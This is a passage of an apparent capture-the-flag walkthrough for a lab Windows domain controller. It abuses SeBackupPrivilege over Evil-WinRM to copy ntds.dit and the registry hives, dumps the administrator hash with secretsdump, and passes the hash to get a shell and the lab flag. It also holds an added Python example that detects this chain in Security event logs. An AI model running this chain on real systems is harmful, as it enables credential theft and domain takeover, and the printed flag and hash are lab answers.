d-----        9/15/2018  12:19 AM                ModemLogs
d-----        7/10/2020   4:47 AM                NTDS
d-----        9/15/2018   2:09 AM                OCR
d-r---        9/15/2018  12:19 AM                Offline Web Pages
d-----         2/1/2020   7:55 PM                Panther
<---->


*Evil-WinRM* PS G:\Windows> cd NTDS
*Evil-WinRM* PS G:\Windows\NTDS> ls


    Directory: G:\Windows\NTDS


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/6/2020   8:35 AM           8192 edb.chk
-a----        7/10/2020   4:02 PM       10485760 edb.log
-a----        2/23/2020   9:41 AM       10485760 edb00003.log
-a----        2/23/2020   9:41 AM       10485760 edb00004.log
-a----        2/23/2020   9:41 AM       10485760 edb00005.log
-a----        2/23/2020   3:13 AM       10485760 edbres00001.jrs
-a----        2/23/2020   3:13 AM       10485760 edbres00002.jrs
-a----        2/23/2020   9:42 AM       10485760 edbtmp.log
-a----        7/10/2020   4:47 AM       18874368 ntds.dit
-a----        7/10/2020  11:18 AM          16384 ntds.jfm
-a----        7/10/2020   4:47 AM         434176 temp.edb


*Evil-WinRM* PS G:\Windows\NTDS> c:
*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll
Info: Uploading SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege g:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/10/2020   4:09 PM            610 2020-07-10_16-09-12_DC01.cab
-a----        7/10/2020   4:08 PM             86 disk_shadow.txt
-a----        7/10/2020   4:50 PM       18874368 ndts.dit
-a----        7/10/2020   4:10 PM          45056 sam.hive
-a----        7/10/2020   4:49 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        7/10/2020   4:48 PM          16384 SeBackupPrivilegeUtils.dll
-a----        7/10/2020   4:10 PM       17346560 system.hive


*Evil-WinRM* PS G:\Windows\NTDS> reg save HKLM\SYSTEM c:\temp\system.hive
The operation completed successfully.
*Evil-WinRM* PS G:\Windows\NTDS> Reg save HKLM\SAM c:\temp\sam.hive
The operation completed successfully.
*Evil-WinRM* PS G:\Windows\NTDS> c:
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/10/2020   4:09 PM            610 2020-07-10_16-09-12_DC01.cab
-a----        7/10/2020   4:08 PM             86 diskexploit.txt
-a----        7/10/2020   4:10 PM          45056 sam.hive
-a----        7/10/2020   4:10 PM       17346560 system.hive
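Every step of this chain, and the earlier password reset done with rpcclient setuserinfo2, leaves a distinct trace in the domain controller's Security log: a logon that is granted SeBackupPrivilege (event 4672), diskshadow and reg.exe process creations with their command lines (event 4688), and the password reset itself (event 4724). As an added example, not code from the original post, the Python below runs simple rules over constructed event records for those three event IDs and correlates hits per account, so that a non-admin account tripping several rules stands out from an administrator doing routine backups. The event records mimic the fields a SIEM extracts from event XML; the EXPECTED_ADMINS allow-list is an assumption, and 4688 carries a command line only when the "Include command line in process creation events" policy is on.

```python
import re
from collections import defaultdict

# Added example, not from the original post: detection logic for the two
# privileged actions in this walkthrough, the password reset done with
# rpcclient setuserinfo2 (Security event 4724) and the Backup Operators
# shadow-copy chain (events 4672 and 4688), run over constructed event
# records. EXPECTED_ADMINS is an assumed allow-list of accounts that are
# expected to hold backup rights on a DC and to reset other users' passwords.

EXPECTED_ADMINS = {"administrator"}

# Command-line patterns taken from the NTDS.dit extraction chain shown above.
COMMAND_RULES = [
    (re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I),
     "scripted diskshadow run: snapshot of a live volume, readable without file locks"),
    (re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I),
     "registry hive exported to disk"),
    (re.compile(r"\bntds\.dit\b", re.I),
     "command line references the AD database"),
]

# Constructed sample; computer, users and command lines follow the post.
SAMPLE_EVENTS = [
    {"EventID": 4672, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeMachineAccountPrivilege"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow /s diskexploit.txt"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SYSTEM c:\temp\system.hive"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "administrator",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft"},
    {"EventID": 4724, "Computer": "DC01", "SubjectUserName": "support",
     "TargetUserName": "audit2020"},
    {"EventID": 4724, "Computer": "DC01", "SubjectUserName": "administrator",
     "TargetUserName": "audit2020"},
    {"EventID": 4672, "Computer": "DC01", "SubjectUserName": "administrator",
     "PrivilegeList": "SeBackupPrivilege SeDebugPrivilege SeTcbPrivilege"},
]


def evaluate(event):
    """Return (rule, detail) when an event matches a rule, otherwise None."""
    eid = event.get("EventID")
    who = event.get("SubjectUserName", "").lower()
    if eid == 4672:
        privs = event.get("PrivilegeList", "").split()
        if "SeBackupPrivilege" in privs and who not in EXPECTED_ADMINS:
            return ("backup-privilege-nonadmin",
                    "logon on %s granted SeBackupPrivilege" % event.get("Computer"))
    elif eid == 4688:
        cmd = event.get("CommandLine", "")
        for pat, why in COMMAND_RULES:
            if pat.search(cmd):
                return ("suspicious-command", why + ": " + cmd)
    elif eid == 4724:
        target = event.get("TargetUserName", "").lower()
        if who not in EXPECTED_ADMINS and who != target:
            return ("password-reset-nonadmin", "reset the password of " + target)
    return None


def detect(events):
    """List of (subject, rule, detail) for every matching event, in log order."""
    hits = []
    for ev in events:
        r = evaluate(ev)
        if r is not None:
            hits.append((ev.get("SubjectUserName"), r[0], r[1]))
    return hits


def correlate(hits):
    """Subjects that trip two or more different rules: one hit can be an admin
    doing their job, a chain of them from a non-admin is the escalation."""
    rules_by_user = defaultdict(set)
    for user, rule, _ in hits:
        rules_by_user[user].add(rule)
    return sorted(u for u, rules in rules_by_user.items() if len(rules) >= 2)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(h)
    print("escalation chains:", correlate(found))
```

On the sample, the administrator's own hive query and password reset produce nothing, support trips the password-reset rule once, and svc_backup trips two different rules and is reported as a chain. The 4672 rule is the cheapest one to deploy: on a domain controller, SeBackupPrivilege in a logon for an account outside the backup allow-list is worth an alert on its own.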
Download these files to your own machine and run this command:
┌─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #python secretsdump.py -ntds ntds.dit -system system.hive local
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
This gives you the hash for administrator:
184fb5e5178480be64824d4cd53b99ee : administrator
┌─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
c4809e0a73899ca82249b1b973c8527e
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
So this machine was all about ENUMERATION!
HOPE YOU LOVED THIS WALKTHROUGH BY LIQUIDRAGE